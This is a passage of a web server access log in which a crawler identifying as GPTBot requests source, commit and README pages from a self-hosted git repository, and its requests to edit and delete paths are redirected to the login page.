AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" -[17/Feb/2026:17:06:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" -[17/Feb/2026:17:06:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" -[17/Feb/2026:17:06:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" -[17/Feb/2026:17:06:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" -[17/Feb/2026:17:06:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" -[17/Feb/2026:17:06:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" -[17/Feb/2026:17:06:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" -[17/Feb/2026:17:06:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" -[17/Feb/2026:17:06:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets?display=source" [Client 74.7.227.38] [Length 11589] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" -[17/Feb/2026:17:06:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11364] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/README.md" -[17/Feb/2026:17:06:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11361] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/README.md" -[17/Feb/2026:17:06:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11364] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/README.md" -[17/Feb/2026:17:06:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12805] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/App.tsx" -[17/Feb/2026:17:06:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11367] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/README.md" -[17/Feb/2026:17:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/README.md?display=source" [Client 74.7.227.38] [Length 11793] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/README.md" -[17/Feb/2026:17:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/README.md?display=source" [Client 74.7.227.38] [Length 11793] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/README.md" -[17/Feb/2026:17:06:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/README.md?display=source" [Client 74.7.227.38] [Length 11796] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/README.md" -[17/Feb/2026:17:06:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 11050] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" -[17/Feb/2026:17:06:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.spec" [Client 74.7.227.38] [Length 12396] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" -[17/Feb/2026:17:06:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Postgres.ico" [Client 74.7.227.38] [Length 11010] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" -[17/Feb/2026:17:06:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 12337] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor" -[17/Feb/2026:17:06:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 16380] [Gzip 5.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor" -[17/Feb/2026:17:06:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 83387] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" -[17/Feb/2026:17:06:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.exe" [Client 74.7.227.38] [Length 11021] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" -[17/Feb/2026:17:06:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 880] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_VeryGood.py" -[17/Feb/2026:17:06:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 20303] [Gzip 6.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:17:06:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 15997] [Gzip 4.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" -[17/Feb/2026:17:06:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.spec" [Client 74.7.227.38] [Length 12438] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" -[17/Feb/2026:17:06:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libpq.dll" -[17/Feb/2026:17:06:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresWatchdog/libpq.dll" -[17/Feb/2026:17:06:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/GoldMonitor.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.spec" -[17/Feb/2026:17:06:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/GoldMonitor.spec" -[17/Feb/2026:17:06:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/Postgres.ico" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Postgres.ico" -[17/Feb/2026:17:06:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/Postgres.ico" -[17/Feb/2026:17:06:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:17:06:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:17:06:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py" -[17/Feb/2026:17:06:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/watchdog.py" -[17/Feb/2026:17:06:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/ReadMe.md" -[17/Feb/2026:17:06:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresWatchdog/ReadMe.md" -[17/Feb/2026:17:06:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libpq.dll" -[17/Feb/2026:17:06:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresWatchdog/libpq.dll" -[17/Feb/2026:17:06:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/Postgres.ico" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Postgres.ico" -[17/Feb/2026:17:06:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/Postgres.ico" -[17/Feb/2026:17:06:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.py" -[17/Feb/2026:17:06:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor.py" -[17/Feb/2026:17:06:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.py" -[17/Feb/2026:17:06:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor.py" -[17/Feb/2026:17:06:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/main.cpp" -[17/Feb/2026:17:06:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresWatchdog/main.cpp" -[17/Feb/2026:17:06:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/AssetPilot.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.spec" -[17/Feb/2026:17:06:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/AssetPilot.spec" -[17/Feb/2026:17:06:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/GoldMonitor.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.exe" -[17/Feb/2026:17:06:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/GoldMonitor.exe" -[17/Feb/2026:17:06:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py" -[17/Feb/2026:17:06:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/watchdog.py" -[17/Feb/2026:17:06:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/GoldMonitor.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.spec" -[17/Feb/2026:17:06:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/GoldMonitor.spec" -[17/Feb/2026:17:06:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/main.cpp" -[17/Feb/2026:17:06:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresWatchdog/main.cpp" -[17/Feb/2026:17:06:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/AssetPilot.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.spec" -[17/Feb/2026:17:06:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/AssetPilot.spec" -[17/Feb/2026:17:06:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/GoldMonitor.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.exe" -[17/Feb/2026:17:06:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 